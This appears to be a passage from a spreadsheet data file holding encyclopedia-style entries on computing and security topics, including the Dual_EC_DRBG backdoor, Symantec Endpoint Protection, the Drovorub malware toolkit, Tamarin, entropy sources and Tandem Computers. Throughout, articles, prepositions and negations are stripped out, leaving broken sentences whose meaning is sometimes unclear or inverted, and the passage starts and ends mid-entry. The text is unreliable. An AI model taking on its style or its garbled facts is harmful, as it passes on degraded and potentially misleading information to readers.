deal insert "known flawed random number generator" bsafe toolkit following york times story asserting dual_ec_drbg contained backdoor, brown (who applied backdoor patent published security reduction) wrote email ietf mailing list defending dual_ec_drbg standard process: dual_ec_drbg, specified nist 800-90a ansi x9.82-3, allows alternative choice constants know, alternatives admit known feasible backdoor. view, incorrect imply dual_ec_drbg always backdoor, though admit wording qualify affected cases awkward. many things obvious hindsight. sure obvious. [...] considered, ansi nist standards dual_ec_drbg viewed subverted standard, maybe that's biased naive. software hardware contained possible backdoor implementations used dual_ec_drbg would usually gotten library. least security (bsafe library), openssl, microsoft, cisco libraries included dual_ec_drbg, bsafe used default. according reuters article revealed secret million deal security nsa, security's bsafe important distributor algorithm. there flaw openssl's implementation dual_ec_drbg made non-working outside test mode, openssl's steve marquess concludes nobody used openssl's dual_ec_drbg implementation.a list products csprng-implementation fips 140-2 validated available nist. validated csprngs listed description/notes field. note even dual_ec_drbg listed validated, enabled default. many implementations come renamed copy library implementation.the blackberry software example non-default use. includes support dual_ec_drbg, default. blackberry however issued advisory customers used consider probable backdoor vulnerability. jeffrey carr quotes letter blackberry: dual drbg algorithm available third party developers cryptographic apis [blackberry] platform. case cryptographic api, available party developer wished functionality explicitly designed developed system requested api. bruce schneier pointed even enabled default, backdoored csprng implemented option make easier targets software-controlled command-line switch select encryption algorithm, "registry" system, like microsoft products, windows vista: trojan really, really big. can’t mistake. it’s massive piece code collecting keystrokes. changing bit-one bit-two registry change default random number generator machine] probably going undetected. conspiracy, highly deniable getting backdoor. there’s benefit getting library product. december 2013 proof concept backdoor published uses leaked internal state predict subsequent random numbers, attack viable next reseed. december 2015, juniper networks announced revisions screenos firmware used dual_ec_drbg suspect points, creating backdoor firewall. originally supposed point chosen juniper generated provably safe way. dual_ec_drbg used seed ansi x9.17 prng. this would obfuscated dual_ec_drbg output thus killing backdoor. however, "bug" code exposed output dual_ec_drbg, hence compromising security system. this backdoor backdoored unknown party changed point test vectors. allegations persistent backdoor access juniper firewalls already published 2013 spiegel.the kleptographic backdoor example nsa's nobus policy, security holes exploit. also random number generator attack crypto swiss company specialising communications information security, widely believed allowed western security agencies (including nsa) insert backdoors cryptography machines references external links nist 800-90a recommendation random number generation using deterministic random generators dual drbg collection dual_ec_drbg information, daniel bernstein, tanja lange, ruben niederhagen. practical exploitability dual implementations research paper stephen checkoway prevalence kleptographic attacks discrete-log based cryptosystems adam young, moti yung (1997) united states patent application publication 2007189527, brown, daniel vanstone, scott "elliptic curve random number generation", assigned certicom corp. dual_ec_drbg backdoor, ways negate backdoor. comments dual-ec-drbg/nist 800-90, draft december 2005 kristian gjøsteen's march 2006 paper concluding dual_ec_drbg predictable, therefore insecure. security analysis nist 800-90 elliptic curve random number generator daniel brown kristian gjøsteen's 2007 security analysis dual_ec_drbg. though least brown aware backdoor (from 2005 patent), backdoor explicitly mentioned. non-backdoored constants greater output truncation dual_ec_drbg specifies assumed. possibility back door nist sp800-90 dual prng shumow niels ferguson's presentation, made potential backdoor widely known. many flaws dual_ec_drbg matthew green's simplified explanation backdoor works. notes random number generators matthew green sorry, rsa, buying summary timeline dual_ec_drbg public knowledge. [cfrg] dual_ec_drbg [was requesting removal cfrg co-chair] december 2013 email daniel brown defending dual_ec_drbg standard process. dueling over dual_ec_drbg: consequences corrupting cryptographic standardization process kostsyuk landau article international cryptographic community's largely continued trust nist despite dual drbg.</t>
  </si>
  <si>
    <t>Symantec Endpoint Protection</t>
  </si>
  <si>
    <t>symantec endpoint protection, developed broadcom inc., security software suite consists anti-malware, intrusion prevention firewall features server desktop computers. largest market-share product endpoint security. version history first release symantec endpoint protection published september 2007 called version 11.0. endpoint protection result merger several security software products, including symantec antivirus corporate edition 10.0, client security, network access control, sygate enterprise edition. endpoint protection also included features. example, block data transfers unauthorized device types, flash drives bluetooth devices.at time, symantec antivirus corporate edition widely criticized become bloated unwieldy. endpoint protection 11.0 intended address criticisms. disk footprint symantec corporate edition 10.0 almost whereas endpoint protection's projected mb.in 2009, symantec introduced managed service, whereby symantec staff deploy manage symantec endpoint protection installations remotely. small business edition faster installation process released 2010. february 2011, symantec announced version 12.0 endpoint protection. version incorporated cloud-based database malicious files called symantec insight. insight intended combat malware generates mutations files avoid detection signature-based anti-malware software. late 2012, symantec released version 12.1.2, supports vmware vshield.a cloud version endpoint protection released september 2016. this followed version november. version incorporates machine learning technology find patterns digital data indicative presence cyber-security threat. also incorporates memory exploit mitigation performance improvements. features symantec endpoint protection security software suite includes intrusion prevention, firewall, anti-malware features. according magazine, endpoint protection also features typical data loss prevention software. typically installed server running windows, linux, macos. 2018, version currently-supported release.endpoint protection scans computers security threats. used prevent unapproved programs running, apply firewall policies block allow network traffic. attempts identify block malicious traffic corporate network coming browser. uses aggregate information users identify malicious software. 2016, symantec claims data million devices installed endpoint security countries.endpoint protection administrative console allows department modify security policies department, programs files exclude antivirus scans. manage mobile devices directly, treats peripherals connected computer protects computer malicious software mobile devices. vulnerabilities early 2012, source code symantec endpoint protection stolen published online. hacker group called "the lords dharmaraja" claimed credit, alleging source code stolen indian military intelligence. indian government requires vendors submit source code computer program sold government, ensure used espionage. july 2012, update endpoint protection caused compatibility issues, triggering blue screen death windows machines running certain third-party file system drivers. 2014, offensive security discovered exploit symantec endpoint protection penetration test financial services organization. exploit application device control driver allowed logged-in user system access. patched august. 2019, ofir moskovitch, security researcher discovered race condition involves critical symantec endpoint protection client core components: client management proactive threat protection directly results protection mechanism failure lead self-defense bypass, "semztptn" symantec endpoint minimized timed protection. reception according gartner, symantec endpoint protection comprehensive endpoint security products available regularly scores well independent tests. however, common criticism customers "fatigued" "near constant changes" product company direction. magazine said endpoint protection "most comprehensive tool type superb installation documentation." review said endpoint protection "no-brainer setup administration," "wart" support fees steep."forrester said version 12.1 complete endpoint security software product market, different security functions software well-integrated. report speculated lack integration would addressed version network world ranked symantec endpoint protection sixth endpoint security products, based data labs testing. references external links official website</t>
  </si>
  <si>
    <t>Drovorub</t>
  </si>
  <si>
    <t>drovorub (russian: дроворуб, "woodcutter") software toolkit developing malware linux operating system. created 85th main special service center, unit russian often referred apt28.drovorub sophisticated modular architecture, containing implant coupled kernel module rootkit, file transfer port forwarding tool, command control server. drovorub described "swiss-army knife hacking linux".the u.s. government report first identified drovorub recommends uefi secure boot linux's native kernel module signing facility resist drovorub attacks. references</t>
  </si>
  <si>
    <t>Tamarin (software)</t>
  </si>
  <si>
    <t>tamarin discontinued free software virtual machine just-in-time compilation (jit) support intended implement edition ecmascript (es4) language standard. tamarin source code originates actionscript virtual machine (avm2) developed adobe systems, introduced within adobe flash player implements actionscript scripting language. actionscript virtual machine donated open-source mozilla foundation november 2006, develop tamarin high-performance virtual machine, support broad mozilla community, used mozilla adobe systems next generation javascript actionscript engines ultimate unify scripting languages across browsers adobe flash platform ease development rich better performing applications. tamarin mozilla source code, including just-in-time compiler conservative garbage collector, donated mozilla foundation november 2006. contributed code tri-licensed gpl, lgpl, licenses developed mozilla's mercurial repository. contributed code approximately 135,000 lines code, making largest single donation code mozilla project besides netscape itself.there plans tamarin part mozilla (and therefore firefox project integrate tamarin spidermonkey called "actionmonkey", canceled 2008 tamarin's interpreter turned slower spidermonkey's plans ecmascript development shifted ecmascript partially implemented existing tamarin source code meant completed joined efforts adobe, mozilla community within tamarin project, ecmascript harmony.tamarin continues used adobe flash player, replaced spidermonkey javascript engine mozilla applications. part tamarin used modern mozilla applications (i.e. firefox 3.5+) spidermonkey nanojit, module used generate native code performing just-in-time compilation. what tamarin adobe contributed code actionscript virtual machine compiler. actionscript compiler also open source part adobe flex. there also crossbridge, open source compiler. tamarin adobe flash player, remains closed source. tamarin virtual machine part flash player. related projects projects related tamarin announced july 2007 brendan eich's keynote ajax experience west: ironmonkey screamingmonkey. ironmonkey project ironpython ironruby tamarin sanghyeon. screamingmonkey's goal allow tamarin within non-mozilla browsers (thus allowing understand javascript starting internet explorer. project mark hammond. neither project production-quality releases current status unclear. etymology both spidermonkey tamarin fulfill closely related goals dubbed monkeys (the spider monkey tamarin, respectively). further reading tamarin page (tamarin obsolete) archived 2016-10-03 wayback machine eich, brendan (november 2006). "project tamarin". retrieved 2021-03-25. mozilla hecker, frank (november 2006). "adobe, mozilla, tamarin". archived original 2020-11-09. mozilla foundation executive director double, chris (may 2008). quick introduction tamarin tracing". retrieved 2021-03-25. mozilla developer double, chris (may 2008). "implementing native methods tamarin tracing". retrieved 2021-03-25. double, chris (may 2008). "extending tamarin tracing forth". retrieved 2021-03-25. "profiling runtime generated interpreted code using vtune performance analyzer" (pdf). intel. archived original (pdf) january 2012. references external links official website tamarin project www-archive.mozilla.org tamarin wiki.mozilla.org</t>
  </si>
  <si>
    <t>Tamper-evident band</t>
  </si>
  <si>
    <t>tamper-evident band security ring serves tamper resistant tamper evident function screw cap, lid, closure. term tamper-proof sometimes used considered misnomer given pilfering still technically possible.a security band integral separate package component. plastic metal structure around circumference (usually) closure often found attached closure bottles, jars, tubs. several variations developed caps, lids, closures. custom printing security printing available. perforations areas weakness often used initiate control tear. sometimes engineered frangibility used break-away functions. while tamper-evident bands considered challenge recycling, important band stays attached case refillable bottles, hard remove rings intact bottles economical way.the opening ring tamper warning: seal ring broken, indication opened. purposes security opening rings might several possible purposes: provide clear evidence container opened deter tampering deter package pilferage deter product adulteration improved closure strength shipping regulatory requirement (sometimes) roll-on metal closures when aluminum plastic bottle integral band, usually connected thin bridges. they molded along slit afterwards. when unscrewing cap, frangible ring breaks: ring separate cap, separate pieces remain, sealing piece leftover ring; broken ring form "pigtail" still attached cap. shrink bands separate bands shrink film placed closure tightened shrink tunnel. some perforations nicks help initiate tear. other most standard pressure sensitive tapes high degree tamper evidence. some special security tapes additional tamper evident features offer better tamper evidence. some intentional weakness cause breakage delamination; others hidden messages appear upon opening. examples also list bottle types, brands companies tamper-evident technology tamper resistance chicago tylenol murders references further reading yam, "encyclopedia packaging technology", john wiley sons, 2009, isbn 978-0-470-08704-6 "improving tamper-evident packaging: problems, tests solutions", jack rosette, 1992</t>
  </si>
  <si>
    <t>Switchover</t>
  </si>
  <si>
    <t>switchover manual switch system redundant standby computer server, system, network upon failure abnormal termination previously active server, system, network, perform system maintenance, installing patches, upgrading software hardware.automatic switchover redundant system error condition, without human intervention, called failover. manual switchover error would used automatic failover available, possibly overall system complex. also safety engineering data integrity fault-tolerance clusters business continuity planning references</t>
  </si>
  <si>
    <t>Enterprise encryption gateway</t>
  </si>
  <si>
    <t>enterprise encryption gateway (eeg) layer encryption device, similar vpn, allows strong authentication encryption data across wireless medium. unlike residential gateway, enterprise gateway typically wlan interface, acts bridge two. client devices client-side authentication/encryption software, eegs encryption termination point network. benefits devices include offloading encryption duties access points. autonomous access points placed downstream eegs 802.1x authenticator. references</t>
  </si>
  <si>
    <t>Tamper-resistant security module</t>
  </si>
  <si>
    <t>tamper-resistant security module (trsm) device incorporates physical protections prevent compromise cryptographic security parameters contains. there varying levels protection afforded trsms: tamper-resistance: make intrusion difficult, usually employing hardened casing tamper-evident: make intrusion attempts evident subsequent viewers, often employing seals must broken intrusion tamper-responsive: detect intrusion attempt destroy contents processa trsm usually also hardware security module (hsm).</t>
  </si>
  <si>
    <t>Dropbear (software)</t>
  </si>
  <si>
    <t>dropbear software package written matt johnston provides secure shell-compatible server client. designed replacement standard openssh environments memory processor resources, embedded systems. core component openwrt router distributions. dropbear originally released april 2003. technology dropbear implements version secure shell (ssh) protocol.the cryptographic algorithms implemented using third-party cryptographic libraries like libtomcrypt included internally dropbear distribution. derives parts openssh handle bsd-style pseudo terminals. features dropbear implements complete version protocol client server. support version backwards-compatibility order save space resources, avoid inherent security vulnerabilities version also implemented. sftp support relies binary file provided openssh similar programs. fish works case supported konqueror. dropbear supports elliptic curve cryptography exchange, version 2013.61test beyond. also project's implementation comparison clients comparison servers references external links official website</t>
  </si>
  <si>
    <t>Drop-out compensator</t>
  </si>
  <si>
    <t>drop-out compensator error concealment device commonly used analog video hide brief signal "drop-outs" videotape playback caused imperfections damage tape's magnetic coating. most compensators worked repeating earlier video scan-lines short periods signal loss; early system, "mincom" developed 1960s minnesota mining manufacturing company, company known because high cost device time, engineers developed simpler, less expensive unit based sample-and-hold technique in-house use.dedicated drop-out compensators eventually superseded incorporation drop-out compensation functionality timebase correctors based analog-to-digital conversion digital line stores. advent compressed digital video systems finally eliminated need line-based drop-out compensators. most low-level media errors, caused tape damage imperfections, dealt forward error correction techniques, overwhelm layer typically severe remedy using simple line-based error concealment techniques, damage compressed bitstream often damage large parts video image. however, since occasional signal drop-outs still occur, either severe tape damage packet loss packetized video transmission, modern error concealment techniques aware structure compressed video format developed deal these. references</t>
  </si>
  <si>
    <t>Entropy (computing)</t>
  </si>
  <si>
    <t>computing, entropy randomness collected operating system application cryptography uses require random data. this randomness often collected hardware sources (variance noise hdd), either pre-existing ones mouse movements specially provided randomness generators. lack entropy negative impact performance security. linux kernel linux kernel generates entropy keyboard timings, mouse movements, timings makes random character data available operating system processes special files /dev/random /dev/urandom. this capability introduced linux version 1.3.30.there linux kernel patches allowing entropy sources. audio_entropyd project, included operating systems fedora, allows audio data used entropy source. also available video_entropyd calculates random data video-source entropybroker includes three used distribute entropy data systems capable running (e.g. virtual machines). furthermore, havege algorithm haveged pool entropy. systems, network interrupts used entropy source well. openbsd kernel openbsd integrated cryptography main goals always worked increasing entropy encryption also randomising many parts including various internal operations kernel. around 2011, random devices dropped linked single source could produce hundreds megabytes second high quality random data average system. this made depletion random data userland programs impossible openbsd enough entropy initially gathered. hurd kernel driver ported linux kernel made available hurd kernel. solaris /dev/random /dev/urandom available packages patches solaris since solaris 2.6, standard feature since solaris solaris administrators remove existing entropy sources define ones kernel-level cryptographic framework. 3rd-party kernel module implementing /dev/random also available releases dating back solaris 2.4. os/2 there software package os/2 allows software processes retrieve random data. windows microsoft windows releases newer windows cryptoapi gather entropy similar fashion linux kernel's /dev/random.windows's cryptoapi uses binary registry hkey_local_machine\software\microsoft\cryptography\rng\seed store seeded value entropy sources.because cryptoapi closed-source, free open source software applications running windows platform measures randomness. example, gnupg, version 1.06, uses variety sources number free bytes memory combined random seed generates desired randomness needs.programmers using capi entropy calling capi's cryptgenrandom(), properly initializing it.cryptoapi deprecated windows vista higher. called cryptography api: next generation (cng). windows's uses binary registry hkey_local_machine\system\rng\seed store seeded value. newer version windows able variety entropy sources: available enabled motherboard entropy uefi interface booted uefi) rdrand instruction available hardware system clock (rtc) oem0 acpi table content interrupt timings keyboard timings mouse movements embedded systems embedded systems difficulty gathering enough entropy often simple devices short boot times, generation operations require sufficient entropy often first things system common entropy sources exist devices, active long enough boot ensure sufficient entropy exists. embedded devices often lack rotating disk drives, human interface devices, even fans, network interface, any, active long enough provide much entropy. lacking easy access entropy, devices hard-coded keys seed random generators, seed random generators easily-guessed unique identifiers device's address. simple study demonstrated widespread weak keys finding many embedded systems routers using keys. thought number weak keys found would higher simple often attacker determinable one-time unique identifiers incorporated entropy systems. (de)centralized systems true random number generator (trng) (de)central service. example centralized system random number acquired randomness beacon service national institute standards technology. cardano platform uses participants decentralized proof-of-stake protocol generate random numbers. other systems there software packages allow userspace process gather random characters, exactly /dev/random does, egd, entropy gathering daemon. hardware-originated entropy modern cpus hardware often feature integrated generators provide high-quality high-speed entropy operating systems. systems based linux kernel, read entropy generated device /dev/hw_random. however, sometimes /dev/hw_random slow;there companies manufacturing entropy generation devices, shipped drivers linux.on linux system, install rng-tools package supports true random number generators (trngs) found cpus supporting rdrand instruction, trusted platform modules intel, amd, chipsets, effectively increasing entropy collected /dev/random potentially improving cryptographic potential. this especially useful headless systems sources entropy. practical implications system administrators, especially supervising internet servers, ensure server processes halt entropy depletion. entropy servers utilising linux kernel, kernel userspace process generates entropy console storage subsystem, often less ideal lack mouse keyboard, thus servers generate entropy limited resources timings. entropy pool size linux viewable file /proc/sys/kernel/random/entropy_avail generally least 2000 bits (out maximum 4096). entropy changes frequently. administrators responsible systems zero entropy attempt /dev/urandom substitute /dev/random cause ssl/tls connections lower-grade encryption.some software systems change diffie-hellman keys often, cases help server continue functioning normally even entropy bottleneck.on servers entropy, process appear hung waiting random characters appear /dev/random linux-based systems). example, known problem debian caused exim4 hang cases this. security entropy sources used keyboard timing attacks.entropy affect cryptography (tls/ssl) server: server fails proper source randomness, keys generated server insecure. cases cracker (malicious attacker) guess bits entropy output pseudorandom number generator (prng), happens enough entropy introduced prng. potential sources commonly used entropy sources include mouse, keyboard, timings, potential sources. example, could collect entropy computer's microphone, building sensor measure turbulence inside disk drive.for unix/bsd derivatives exists based solution utilizes cortex filtering securing stream generated entropy generator sources system.cloudflare image feed rack lava lamps additional source entropy. also entropy (information theory) entropy randomness references external links overview entropy entropy generators linux]</t>
  </si>
  <si>
    <t>Envsys</t>
  </si>
  <si>
    <t>envsys framework kernel-level hardware monitoring sensors framework netbsd. march 2019, framework used close device drivers export various environmental monitoring sensors, evidenced references sysmon_envsys_register symbol within path netbsd; temperature sensors, envsys_stemp, likely type exported given driver.: sensors registered kernel sysmon_envsys(9) api. consumption monitoring sensors userland performed help envstat utility proplib(3) ioctl(2) /dev/sysmon pseudo-device file, powerd power management daemon responds kernel events running scripts /etc/powerd/scripts/, well third-party tools like symon gkrellm pkgsrc. features framework allows user amend monitoring limits specified driver, driver perform monitoring sensors kernel space, even programme hardware chip monitoring system automatically.: §7.1 levels limits defined: critical warning, additionally extend categorisation.: §7.1 limit thresholds crossed, kernel event generated, caught userland powerd execute pre-defined user script. comparison, openbsd's hw.sensors, monitoring user-defined values performed userspace sensorsd. 2019, framework facilitate computer control, although drivers could still implement interfacing fan-controlling capabilities chips means, example, driver-specific sysctl interface, approach taken dbcool(4) driver. however, drivers popular super chips like lm(4) itesio(4) implement control fact, historically, openbsd, netbsd dragonfly, drivers even report duty cycle fans actual values reported). history framework undergone major revisions: first version envsys.h committed december 1999 (1999-12-15); envsys.4 page following february 2000 (2000-02-27). between 2000 2007, manual page envsys(4) netbsd stated "api experimental", "entire replaced sysctl(8)", "should developed"; noted 2003 exact approach taken openbsd sysctl hw.sensors envsys(4) drivers ported openbsd.: §6.1 second revision came july 2007 (2007-07-01). serialisation userland reimplemented using property lists help netbsd's proplib(3) library (the underlying transport layer kernel userland still done ioctl).the envsys framework precursor openbsd's sysctl hw.sensors framework 2003, many drivers, well sensor types, ported back forth netbsd openbsd. support sensors drive type added netbsd 2007, similar drive type openbsd, time bio(4) bioctl ported openbsd netbsd.: §7.1 also bioctl hw.sensors lm_sensors speedfan references external links /sys/sys/envsys.h</t>
  </si>
  <si>
    <t>Tandem Computers</t>
  </si>
  <si>
    <t>tandem computers, inc. dominant manufacturer fault-tolerant computer systems networks, banks, stock exchanges, telephone switching centers, similar commercial transaction processing applications requiring maximum uptime zero data loss. company founded jimmy treybig 1974 cupertino, california. remained independent 1997, became server division within compaq. server division within hewlett packard enterprise, following hewlett-packard's acquisition compaq split hewlett packard inc. hewlett packard enterprise. tandem's nonstop systems number independent identical processors redundant storage devices controllers provide automatic high-speed "failover" case hardware software failure. contain scope failures corrupted data, multi-computer systems shared central components, even main memory. conventional multi-computer systems shared memories work directly shared data objects. instead, nonstop processors cooperate exchanging messages across reliable fabric, software takes periodic snapshots possible rollback program memory state. besides handling failures well, "shared-nothing" messaging system design also scales extremely well largest commercial workloads. each doubling total number processors would double system throughput, maximum configuration 4000 processors. contrast, performance conventional multiprocessor systems limited speed shared memory, bus, switch. adding processors manner gives system speedup. nonstop systems often bought meet scaling requirements extreme fault tolerance. they compete well ibm's largest mainframes, despite built simpler minicomputer technology. founding tandem computers founded 1974 james (jimmy) treybig. treybig first market need fault tolerance oltp (online transaction processing) systems running marketing team hewlett packard's 3000 computer division, interested developing niche. joined venture capital firm kleiner perkins developed tandem business plan there. treybig pulled together core engineering team hired away 3000 division: mike green, katzman, dave mackie jack loustaunou. their business plan called ultra-reliable systems never outages never lost corrupted data. these modular safe "single-point failures", would marginally expensive conventional non-fault-tolerant systems. they would less expensive support throughput existing ad-hoc toughened systems used redundant usually required "hot spares". each engineer confident could quickly pull part tricky design, doubted others' areas could worked out. parts hardware software design different largely based incremental improvements familiar hardware software designs 3000. many subsequent engineers programmers also came tandem headquarters cupertino, california, quarter mile away offices. initial venture capital investment tandem computers came perkins, formerly general manager 3000 division. business plan included detailed ideas building unique corporate culture reflecting treybig's values. design initial tandem/16 hardware completed 1975 first system shipped citibank 1976. company enjoyed uninterrupted exponential growth 1983. inc. magazine ranked tandem fastest-growing public company america. 1996, tandem $2.3 billion company employing approximately 8,000 people worldwide. tandem nonstop (tns) stack machines over years, tandem's main nonstop product line grown evolved upward-compatible initial t/16 fault-tolerant system, three major changes date top-level modular architecture programming-level instruction architecture. within series, several major re-implementations chip technology progressed. while conventional systems era, including large mainframes, mean-time-between-failures (mtbf) order days, nonstop system designed failure intervals times longer, uptimes measured years. nevertheless, nonstop designed price-competitive conventional systems, simple 2-cpu system priced twice competing single-processor mainframe, opposed four times fault-tolerant solutions. nonstop first system tandem/16 t/16, later re-branded nonstop machine consisted cpus, organized fault-tolerant computer cluster packaged single rack. each private, unshared memory, processor, private connect controllers, dual connections cpus custom inter-cpu backplane called dynabus. each disk controller network controller duplicated dual connections cpus devices. each disk mirrored, separate connections independent disk controllers. disk failed, data still available mirrored copy. controller failed, disk still reachable alternative cpu, controller, and/or bus. each disk network controller connected independent cpus. power supplies wired side pair cpus, controllers, buses, system would keep running well without loss connections power supply failed. careful complex arrangement parts connections customers' larger configurations documented mackie diagram, named lead salesman david mackie invented notation. none duplicated parts wasted "hot spares"; everything added system throughput normal operations. besides recovering well failed parts, t/16 also designed detect many kinds intermittent failures possible, soon possible. this prompt detection called "fail fast". point find isolate corrupted data permanently written databases disk files. t/16, error detection added custom circuits added little cost total design; major parts duplicated error detection. t/16 proprietary design. greatly influenced 3000 minicomputer. they microprogrammed, 16-bit, stack-based machines segmented, 16-bit virtual addressing. both intended programmed exclusively high-level languages, assembler. both initially implemented standard low-density chips, holding 4-bit slice 16-bit alu. both small number top-of-stack, 16-bit data registers plus extra address registers accessing memory stack. both used huffman encoding operand address offsets, large variety address modes offset sizes 16-bit instruction format good code density. both relied heavily pools indirect addresses overcome short instruction format. both supported larger 64-bit operands multiple cycles, memory-to-memory string operations. both used "big-endian" addressing long versus short memory operands. these features inspired burroughs b5500-b6800 mainframe stack machines. t/16 instruction changed several features 3000 design. t/16 supported paged virtual memory beginning. 3000 series paging pa-risc generation, years later (although form paging firmware, 1978). tandem added support 32-bit addressing second machine; 3000 lacked pa-risc generation. paging long addresses critical supporting complex system software large applications. t/16 treated top-of-stack registers novel way; compiler, microcode, responsible deciding full registers spilled memory stack empty registers re-filled memory stack. 3000, decision took extra microcode cycles every instruction. 3000 supported cobol several instructions calculating directly arbitrary-length (binary-coded decimal) strings digits. t/16 simplified single instructions converting strings 64-bit binary integers. t/16, consisted boards logic srams, mips. instant, could access four virtual memory segments (system data, system code, user data, user code), limited size. 16-bit address spaces already small major applications shipped. first release t/16 single programming language, transaction application language (tal). this efficient machine-dependent systems programming language (for operating systems, compilers, etc.) could also used non-portable applications. derived 3000's system programming language (spl). both semantics similar syntax based burroughs' algol. subsequent releases added support cobol74, fortran, mumps. tandem nonstop series custom operating system significantly different unix 3000's mpe. initially called t/tos (tandem transactional operating system) soon named guardian ability protect data machine faults software faults. contrast commercial operating systems, guardian based message passing basic processes interact, without shared memory, regardless processes running. this approach easily scaled multiple-computer clusters helped isolate corrupted data propagated. file system processes transactional application processes structured master/slave pairs processes running separate cpus. slave process periodically took snapshots master's memory state, took workload master process trouble. this allowed application survive failures associated devices, without data loss. allowed recovery intermittent-style software failures. between failures, monitoring slave process added performance overhead less 100% duplication system designs. some major early applications directly coded checkpoint style, instead used various tandem software layers details semi-portable way. nonstop 1981, t/16 cpus replaced nonstop main difference t/16 support occasional 32-bit addressing user-switchable "extended data segment". this supported next years growth software huge advantage t/16 3000. unfortunately, visible registers remained 16-bit, unplanned addition instruction required executing many instructions memory reference compared 32-bit minicomputers. subsequent computers hampered instruction inefficiency. also, nonstop lacked wider internal data paths required additional microcode steps 32-bit addresses. nonstop three boards, using chips design similar t/16. nonstop also replaced core memory battery-backed dram memory. nonstop 1983, nonstop first entirely implementation instruction architecture. built standard chips programmed array logic chips, four boards module. tandem's first cache memory. direct implementation 32-bit addressing, still sent 16-bit adders. wider microcode store allowed major reduction cycles executed instruction; speed increased mips. used rack packaging, controllers, backplane, buses before. dynabus buses overdesigned t/16 would work several generations upgrades. nonstop systems could combined fox, long-distance fault-tolerant fibre optic connecting clusters across business campus; cluster clusters total cpus. this allowed scale-up taking largest mainframe applications. like modules within computers, guardian could failover entire task sets machines network. worldwide clusters 4000 cpus could also built conventional long-haul network links. nonstop 1986, tandem introduced third generation cpu, nonstop vlx. 32-bit datapaths, wider microcode, cycle time, peak rate instruction microcycle. built three boards gate array chips (with pinout). revised dynabus speed raised mbytes/sec link, mbytes/sec total. increased physical diameter clusters kilometers. tandem's initial database support hierarchical, non-relational databases enscribe file system. this extended relational database called encompass. 1986 tandem introduced first fault-tolerant database, nonstop sql. developed totally in-house, nonstop includes number features based guardian ensure data validity across nodes. nonstop famous scaling linearly performance number nodes added system, whereas databases performance plateaued quite quickly, often cpus. later version released 1989 added transactions could spread nodes, feature remained unique time. nonstop continued evolve, first sql/mp sql/mx, transitioned tandem compaq code remains hp's sql/mx apache trafodion project. nonstop 1987 tandem introduced nonstop clx, low-cost less-expandable minicomputer system. role growing fault-tolerant market, deploying remote edges large tandem networks. initial performance roughly similar txp; later versions slower vlx. small cabinet could installed "copier room" office environment. board, containing "compiled silicon" asic cmos chips. core chip duplicated lock stepped maximal error detection. pinout main limitation chip technology. microcode, cache, external core shared single single sram memory bank. result, required least machine cycles instruction. nonstop cyclone 1989 tandem introduced nonstop cyclone, fast expensive system mainframe market. each self-checking took three boards full hot-running gate array chips, plus memory boards. despite microprogrammed, superscalar, often completing instructions cache cycle. this accomplished separate microcode routine every common pair instructions. that fused pair stack instructions generally accomplished work single instruction normal 32-bit minicomputers. cyclone processors packaged sections four cpus each, sections joined fiber optic version dynabus. like tandem's prior high-end machines, cyclone cabinets styled much angular black suggest strength power. advertising videos directly compared cyclone lockheed sr-71 blackbird mach plane. cyclone's name supposed represent unstoppable speed roaring oltp workloads. announcement october press came town. that afternoon, region struck magnitude loma prieta earthquake, causing freeway collapses oakland major fires francisco. tandem offices shaken, badly hurt site. this first last time tandem named products natural disaster. other product lines rainbow 1980–1983, tandem attempted re-design entire hardware software stack nonstop methods stronger foundation inherited 3000 traits. rainbow's hardware 32-bit register-file machine aimed better vax. reliable programming, main programming language "tpl", subset ada. time, people barely understood compile unoptimized code. there migration path existing nonstop system software coded tal. database cobol compilers entirely redesigned. customers would totally disjoint product line requiring all-new software them. software side ambitious project took much longer planned. hardware already obsolete out-performed software ready, rainbow project abandoned. subsequent efforts emphasized upward compatibility easy migration paths. development rainbow's advanced client/server application development framework called "crystal" continued awhile longer spun "ellipse" product cooperative systems inc. dynamite 1985, tandem attempted grab piece rapidly growing personal computer market introduction ms-dos based dynamite pc/workstation. sadly, numerous design compromises (including unique 8086-based hardware platform incompatible expansion cards extremely limited compatibility ibm-based pcs) relegated dynamite serving primarily smart terminal. quietly quickly withdrawn market. integrity tandem's message-based nonstop operating system advantages scaling, extreme reliability, efficiently using expensive "spare" resources. many potential customers wanted good-enough reliability small system, using familiar unix operating system industry-standard programs. tandem's various fault-tolerant competitors adopted simpler hardware-only memory-centric design recovery done switching spares. successful competitor stratus technologies, whose machines re-marketed "ibm system/88". systems, spare processors contribute system throughput failures, merely redundantly execute exactly data thread active processor instant, "lock step". faults detected seeing cloned processors' outputs diverged. detect failures, system must physical processors logical, active processor. also implement automatic failover recovery, system must three four physical processors logical processor. triple quadruple cost sparing practical duplicated parts commodity single-chip microprocessors. tandem's products market began integrity line 1989, using mips processors "nonstop variant unix. developed austin 1991, integrity used tmr, triple modular redundancy, logical used three mips r2000 microprocessors execute data thread, voting find lock failed part. their fast clocks could synchronized strict lock stepping, voting instead happened interrupt. some version integrity used "pair spares" redundancy. pairs processors lock-step check other. when disagreed, processors marked untrusted workload taken hot-spare pair processors whose state already current. 1995, integrity s4000 first servernet moved toward sharing peripherals nonstop line. wolfpack 1995–1997, tandem partnered microsoft implement high-availability features advanced configurations clusters commodity windows machines. this project called "wolfpack" first shipped microsoft cluster server 1997. microsoft benefited greatly partnership; tandem not. tns/r nonstop migration mips when tandem formed 1974, every computer company design build cpus basic circuits, using proprietary instruction compilers etc. with year semiconductor progress moore's law, cpu's core circuits could single chips, faster much cheaper result. became increasingly expensive computer company design advanced custom chips, build plants fabricate chips. facing challenges rapidly changing marketplace manufacturing landscape, tandem chose partner mips adopted r3000 successor chipsets advanced optimizing compiler. subsequent nonstop guardian machines using mips architecture known programmers tns/r machines, variety marketing names. cyclone/r 1991, tandem released cyclone/r, also known clx/r. this cost mid-range system based components, used r3000 microprocessors instead much slower stack machine board. minimize time market, machine initially shipped without mips native-mode software. everything, including operating system database, compiled stack machine code. that object code translated equivalent partially optimized mips instruction sequences kernel install time tool called accelerator. less-important programs could also executed directly without pre-translation, code interpreter. these migration techniques successful still today. everyone's software brought without extra work, performance good enough mid-range machines, programmers could ignore instruction differences, even debugging machine code level. these cyclone/r machines updated faster native-mode follow-up release. r3000 later microprocessors typical amount internal error checking, insufficient tandem's needs. cyclone/r pairs r3000 processors lock step, running data thread. used curious variation lock stepping. checker processor cycle behind primary processor. this allowed share single copy external code data caches without putting excessive pinout load sysbus lowering system clock rate. successfully microprocessors lock step, chips must designed fully deterministic. hidden internal state must cleared chip's reset mechanism. otherwise, matched chips sometimes sync visible reason without faults, long chips restarted. chip designers agree good principles helps test chips manufacturing time. microprocessor chips seemed bugs area, 